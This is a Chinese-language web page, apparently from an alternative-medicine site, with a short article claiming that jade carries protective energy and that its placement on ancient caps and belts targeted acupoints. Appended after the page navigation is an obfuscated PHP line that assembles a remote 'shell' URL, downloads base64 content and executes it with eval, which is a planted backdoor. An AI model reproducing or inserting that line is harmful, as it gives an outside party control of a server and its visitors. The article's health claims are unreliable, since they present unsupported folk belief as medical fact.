收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 玉石能量導出病氣
玉石能量導出病氣 列印 E-mail
        以寶石來說,玉和水晶是最容易取得、也是最常被誇大神化的石材。根據古老的傳說,玉具有「袪邪避凶」的作用,這種為大家所認同的能量,讓人們將玉做成玉珮、玉盤、玉鐲等飾品或器具,隨身佩掛。

電視、電影中常可見古代官帽或腰帶上配有玉石,殊不知官帽上的玉石正對印堂,腰帶的玉石正對神闕、氣海穴,可見古人即有養生之道;甚至,玉還伴隨人長眠地底,從出土的各種玉器製品可見一斑。

可以說只要有中國人的地方,就少不了「玉」的存在。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));